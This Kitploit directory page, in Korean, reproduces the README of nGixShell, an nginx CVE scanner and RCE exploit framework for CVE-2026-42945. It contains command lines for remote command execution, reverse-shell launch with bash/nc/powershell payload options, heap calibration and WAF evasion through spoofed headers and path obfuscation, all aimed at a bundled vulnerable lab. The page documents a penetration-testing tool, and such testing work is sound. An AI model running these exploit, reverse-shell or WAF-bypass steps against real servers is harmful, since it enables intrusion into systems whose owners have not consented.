Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
nGixshell — nginx CVE 스캐너 + RCE 익스플로잇 프레임워크 (CVE-2026-42945 + 기타 16개) | Kitploit
도구/GitHubGitHub/mateusverass/ngixshell
ReconnaissanceVulnerability ScannersExploit FrameworksWeb Application ExploitationWAF BypassWeb SecurityPenetration TestingCommand and ControlSubdomain EnumerationRed TeamingPayload Development
218323일 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHub
mateusverass/ngixshell

nGixshell

nginx CVE 스캐너 + RCE 익스플로잇 프레임워크 (CVE-2026-42945 + 기타 16개)

저장소 보기
nGixShell

Python CVEs Zero deps License


nGixShell은 nginx CVE 스캐너이자 RCE 익스플로잇 프레임워크입니다. CVE-2026-42945(F5/NVD 기준 CVSS 3.1 8.1 HIGH) — ngx_http_rewrite_module의 힙 버퍼 오버플로 — 에 대한 개념 증명(PoC)과 함께, 자동화된 HTTP 프로브, 핑거프린팅, WAF 탐지/우회, 웹 보안 감사, 보고서 생성을 지원하는 64개의 nginx CVE를 커버하는 스캐너를 제공합니다.

외부 의존성 없음. 순수 Python 3 표준 라이브러리만 사용합니다.

익스플로잇 전제 조건 (먼저 읽어보세요). --cmd / --shell은 다음 조건이 모두 충족될 때만 동작합니다: 대상이 x86_64이고, 취약한 rewrite+set 설정이 존재하며, ASLR이 비활성화되어 있고, 힙/libc 주소가 해당 빌드에 맞게 보정되어 있어야 합니다(calibrate.py → --build-file). 자세한 내용은 익스플로잇 요구사항을 참조하세요. 스캐너 자체에는 이러한 요구사항이 없습니다.


빠른 시작

# Spin up the vulnerable lab (builds nginx from source, ASLR disabled)
docker compose -f env/docker-compose.yml up -d --build

# Auto mode — fingerprint + CVE scan + web audit (works on any arch)
python3 ngixshell.py 127.0.0.1:19321

# RCE — calibrate, restart the worker for a clean heap, then exploit
W=$(pgrep -f 'nginx: worker' | head -1)
sudo python3 calibrate.py 127.0.0.1 19321 "$W" --spray-path /spray \
    --spray-mode full --json -o profile.json
docker compose -f env/docker-compose.yml restart nginx-vuln
python3 ngixshell.py 127.0.0.1:19321 --cmd 'id > /tmp/rce.txt' \
    --build-file profile.json
docker compose -f env/docker-compose.yml exec nginx-vuln cat /tmp/rce.txt

# Drop a reverse shell (IP auto-detected)
python3 ngixshell.py 127.0.0.1:19321 --shell --shell-type bash --upgrade-shell --build-file profile.json

# Detect and bypass WAF, then scan
python3 ngixshell.py 127.0.0.1:19321 --waf-bypass

# Subdomain scan
python3 ngixshell.py --subdomain-scan example.com --scan-port 443

# Multiple targets from a file (one report per target)
python3 ngixshell.py --target-file hosts.txt --json --html-report results.html

플래그는 필요하지 않습니다 — 도구를 대상에 지정하면 모든 것이 자동으로 실행됩니다.
TLS는 자동 감지됩니다. server_tokens off 상태에서도 nginx가 핑거프린팅됩니다.

system()은 stdout을 캡처하지 않습니다: --cmd 'id'는 실행되지만 아무것도 출력하지 않습니다. 관찰 가능한 부작용이 있는 명령을 사용하고 --verify-url http://target/pwned로 확인하세요(HTTP 200 = 확인됨).


사용법

python3 ngixshell.py [TARGET] [OPTIONS]

TARGET formats:
  127.0.0.1
  192.168.1.10:8080
  http://192.168.1.10:8080
  https://target.local

모드

플래그설명
(없음)자동 — 핑거프린트 + CVE 스캔 + 웹 감사
--cmd 'CMD'CVE-2026-42945 RCE를 통한 명령 실행
--cmd-file FILE파일에서 명령 실행 (;로 연결)
--shell리버스 셸 실행
--shell-type TYPE페이로드: bash python perl php nc powershell (기본값: python)
--upgrade-shell셸 연결 후 PTY 업그레이드 자동 전송
--verify-url URL크래시 감지 후 URL을 가져와 명령 실행 확인 (200 = 확인됨)
--subdomain-scan DOMAIN서브도메인에서 취약한 nginx 탐색
--cve CVE-ID특정 CVE 하나만 테스트
--list-cvesCVSS 및 프로브 정보와 함께 64개 CVE 모두 출력
--list-candidates힙 주소 후보 출력
--dry-run핑거프린트 + 스캔만 수행, 익스플로잇 없음
--target-file FILE파일에서 여러 호스트 스캔

익스플로잇 튜닝

플래그설명
--build-file FILE권장. calibrate.py --json -o FILE로 생성한 JSON 보정 프로필
--offsets SPECcalibrate.py에서 얻은 쉼표로 구분된 16진수 힙 오프셋 (예: 0x5a427,0x60e67)
--heap-base HEX / --libc-base HEX / --system-addr HEX수동 주소 재정의
--build KEY내장 프로필 (DepthFirst 랩 참조만 제공됨)
--rewrite-path PATH취약한 rewrite 위치 (기본값 /api)
--spray-path PATHPOST 본문 스프레이에 사용되는 proxy_pass 기반 위치 (기본값 /upload; 번들 랩은 /spray 사용)
--spray-mode partial|fullpartial: 짧은 본문 + 큰 Content-Length (번들 랩); full: 완전한 본문 + X-Delay (DepthFirst 랩)
--pad-a N / --pad-plus N+ 실행 전 트리거 경로 패딩 (기본값 349 / 969, 벤더 PoC 기준)
--continue-on-crash확인되지 않은 크래시 후 나머지 힙 후보 계속 시도
--tries N / --spray N / --body-len N후보당 트리거 시도 횟수 / 스프레이 연결 수 / 스프레이 본문 크기

WAF 탐지 및 우회

플래그설명
--waf-detect스캔 전 WAF 탐지
--waf-bypass모든 우회 기법 활성화 (탐지도 함께 실행)
--waf-ip IP우회 헤더에 이 IP를 스푸핑 (기본값: 임의 RFC1918)

우회 기법 (--waf-bypass 설정 시 모두 활성화):

기법세부 사항
IP 스푸핑X-Forwarded-For, X-Real-IP, X-Originating-IP, True-Client-IP, X-Remote-IP, X-Client-IP
UA 로테이션11개의 실제 브라우저/봇 User-Agent, 요청마다 무작위화
경로 난독화이중 슬래시, /./ 패딩, 퍼센트 인코딩, 대소문자 변형
헤더 대소문자 셔플WAF 패턴 매칭을 깨기 위해 헤더 이름 대소문자 무작위화

탐지되는 WAF: Cloudflare, AWS WAF, Akamai, Imperva/Incapsula, ModSecurity, F5 BIG-IP ASM, Sucuri, Barracuda, NAXSI, Fastly, Wordfence

웹 감사

스캔 모드에서 자동으로 실행됩니다. 모든 모듈은 개별적으로 건너뛸 수 있습니다.

플래그설명
--skip-headersHTTP 보안 헤더 감사 건너뛰기
--skip-paths경로/파일 탐색 건너뛰기
--skip-vhosts가상 호스트 열거 건너뛰기
--skip-tlsTLS 프로토콜 감사 건너뛰기
--path-wordlist FILE추가로 프로브할 경로 (한 줄에 하나)
  • 헤더 감사 — HSTS, CSP, X-Frame-Options, X-Content-Type-Options, Referrer-Policy, Permissions-Policy, 버전 노출 헤더
  • 경로 탐색 — 50개 이상의 경로; 센티넬 프로브로 catch-all 403/301 규칙의 오탐 제거
  • 가상 호스트 열거 — 기본 블록 오탐을 피하기 위해 상태 AND 본문 차이 필요
  • TLS 감사 — TLS 1.0–1.3 지원, 인증서 만료, 자체 서명 감지 테스트
  • stub_status — /nginx_status가 노출된 경우 활성 연결 메트릭 파싱

연결

플래그설명
--port PORT포트 재정의
--tlsTLS 강제 (기본적으로 자동 감지)
--proxy URL프록시: http://, https://, socks5://

HTTP

플래그설명
--user-agent UA사용자 정의 User-Agent
--auth USER:PASSHTTP Basic 인증
--cookie VALUECookie 헤더
--header NAME:VALUE추가 헤더 (반복 가능)

속도 / 타이밍

플래그설명
--rate-limit RPS초당 최대 요청 수
--jitter MS요청 간 0–MS ms 무작위 지연
--retry N불확실한 프로브 재시도 (기본값: 1)
--timeout-multiplier X모든 타임아웃 조정 (기본값: 1.0)

출력

플래그설명
--output FILEFILE에 로그 기록
--json종료 시 JSON 요약 출력 (다중 대상: {"targets": [...]})
--html-report [FILE]HTML 보고서 생성 (다중 대상 모드에서는 대상당 하나의 파일)
--verbose디버그 출력

종료 코드: 0 — 발견 사항 없음 / 익스플로잇 확인됨; 1 — 발견 사항 존재, 크래시 없음, 또는 실행 오류. CI 게이팅용입니다. --verify-url 없는 --cmd는 감지된 워커 크래시 시 0을 반환하는데, 이는 오버플로가 풀 정리 포인터에 도달했음만 증명할 뿐 코드가 실행되었음을 증명하지는 않습니다.


CVE 커버리지

2009–2026년에 걸친 64개 항목. 점수는 작성 시점의 NVD/F5 권고에서 가져온 CVSS v3.1 기본 메트릭을 반영합니다(트리아지에 의존하기 전에 확인하세요). 범위는 https://nginx.org/en/security_advisories.html를 따릅니다.

도구 다운로드